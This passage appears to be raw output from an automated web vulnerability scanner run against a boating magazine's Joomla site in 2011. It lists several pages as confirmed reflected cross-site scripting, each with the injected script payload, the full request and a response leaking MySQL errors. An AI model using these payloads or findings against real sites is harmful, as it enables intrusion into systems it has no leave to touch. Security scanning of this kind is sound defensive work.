Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><spa..
- /columns-blogs/under-way

/columns-blogs/under-way CONFIRMED

http://www.soundingsonline.com/columns-blogs/under-way?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00202F)</script>

Request

GET /columns-blogs/under-way?'"--></style></script><script>netsparker(0x00202F)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00202F)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00202F)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/columns-blogs/under-way" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Underway Column Editorial by Editor Bill Sisson | Soundings Online Column</title> <link href="/columns-blogs/under-way?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/columns-blogs/under-way?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_columns_blogs c_under_way m_under_way"><!--
Type of page: category<br />Section: 8, s_columns_blogs<br />Category: 58, c_under_way<br />Menu: 97, m_under_way-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBT..
- /boat-shop/new-gear

/boat-shop/new-gear CONFIRMED

http://www.soundingsonline.com/boat-shop/new-gear?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002028)</script>

Request

GET /boat-shop/new-gear?'"--></style></script><script>netsparker(0x002028)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002028)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002028)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/new-gear" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating Market's Newest and Hottest Gear</title> <link href="/boat-shop/new-gear?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/new-gear?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_new_gear m_new_gear"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 48, c_new_gear<br />Menu: 64, m_new_gear-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</spa..
- /columns-blogs/new-england-fishing

/columns-blogs/new-england-fishing CONFIRMED

http://www.soundingsonline.com/columns-blogs/new-england-fishing?'%22--%3E%3C/style%3E%3C/script%3E%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00204E)</script>

Request

GET /columns-blogs/new-england-fishing?'"--></style></script><script>netsparker(0x00204E)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
